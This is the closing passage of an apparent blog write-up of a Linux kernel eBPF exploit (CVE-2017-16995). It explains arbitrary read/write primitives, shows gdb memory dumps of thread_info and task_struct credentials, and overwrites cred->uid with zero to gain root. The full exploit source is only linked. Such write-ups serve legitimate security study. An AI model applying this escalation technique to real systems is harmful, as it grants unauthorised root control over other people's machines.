(1) a = 0; (arbitrary read) read value at b, and store the value into the third element in bpf_map.
(2) a = 1; (leak frame pointer) load the value of frame pointer into the third element in bpf_map.
(3) a = 2; (arbitrary write) write value of c at address b.

Local Privilege Escalation

Finally, we can come to the point of EoP, the final part of exploit. Here I just need to figure out what to do after leaking the frame pointer.
Since the struct struct_task is stored in the thread_info, which is located at the top of stack.

struct thread_info {
	struct task_struct	*task;		/* main task structure */
	__u32			flags;		/* low level flags */
	__u32			status;		/* thread synchronous flags */
	__u32			cpu;		/* current CPU */
	mm_segment_t		addr_limit;
	unsigned int		sig_on_uaccess_error:1;
	unsigned int		uaccess_err:1;	/* uaccess failed */
};

After leaking the frame pointer, all we need to do is to locate the address at the top of stack.

#register status at the time of leaking frame pointer
0xffff88007742e200:	0x0000000200000002	0x0000000800000004
0xffff88007742e210:	0x0000000100000003	0xffff88007c405e00
0xffff88007742e220:	0xffffffff81a14060	0x0000000000000000
0xffff88007742e230:	0x0000000000000000	0x0000000000000000
0xffff88007742e240:	0x0000000000000000	0x0000000000000001
0xffff88007742e250:	0x0000000000000008	0x0000000000000000
0xffff88007742e260:	0x0000000000000001	0x0000000000000000
0xffff88007742e270:	0xffff88007a41bcc8	0x0000000000000000
0xffff88007742e280:	0xffff88007742e000	0xffffffff811b78a0
0xffff88007742e290:	0x0000000000000000	0xffff88007742e298

#memory layout at top of stack
0xffff88007a418000:	0xffff88007c9edc00	0x0000000000000000
0xffff88007a418010:	0x0000000000000000	0x00007ffffffff000
0xffff88007a418020:	0x0000000000000000	0x0000000057ac6e9d
0xffff88007a418030:	0x0000000000000000	0x0000000000000000

#credential info of current task_struct
(gdb) p/x *(((struct task_struct*)(0xffff88007c9edc00))->cred)
$6 = {usage = {counter = 0xa}, uid = {val = 0x3e8}, gid = {val = 0x3e8}, suid = {val = 0x3e8}, sgid = {val = 0x3e8}, euid = {val = 0x3e8}, egid = {val = 0x3e8}, fsuid = {val = 0x3e8}, fsgid = {val = 0x3e8}, securebits = 0x0, cap_inheritable = {cap = {0x0, 0x0}}, cap_permitted = {cap = {0x0, 0x0}}, cap_effective = {cap = {0x0, 0x0}}, cap_bset = {cap = {0xffffffff, 0x3f}}, cap_ambient = {cap = {0x0, 0x0}}, jit_keyring = 0x0, session_keyring = 0xffff88007a58c300, process_keyring = 0x0, thread_keyring = 0x0, request_key_auth = 0x0, security = 0xffff88007a55e2e0, user = 0xffff88007c405e00, user_ns = 0xffffffff81e389a0, group_info = 0xffff88007a58e900, rcu = {next = 0x0, func = 0x0}}

For the purpose of EoP, all we need to do is to change the value of uid to 0. The task is finished. So we just need to leak the value of task_struct->cred and set the value of task_struct->cred->uid to 0.

#with little effort we can know the offset of cred in task_struct
(gdb) p/x  (unsigned long)(&(((struct task_struct*)(0xffff88007c9edc00))->cred)) - 0xffff88007c9edc00
$14 = 0x5a8

All we need to do is to modify the offset of cred, and we finally get local privilege escalation.

Conclusion

This exploit looks like a VM escape in kernel space. So I decide to take a lot time to finish this post to cover as many details in the exploit as possible.

Reference

[1] http://cyseclabs.com/exploits
[2] http://www.cnblogs.com/rebeyond/p/8921307.html
[3] https://security.tencent.com/index.php/blog/msg/124
[4] https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/linux-4.4.33.tar.gz
[5] https://github.com/dangokyo/CVE_2017_16995/blob/master/disassembler.c
[6] https://github.com/dangokyo/CVE_2017_16995/blob/master/eop.c

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.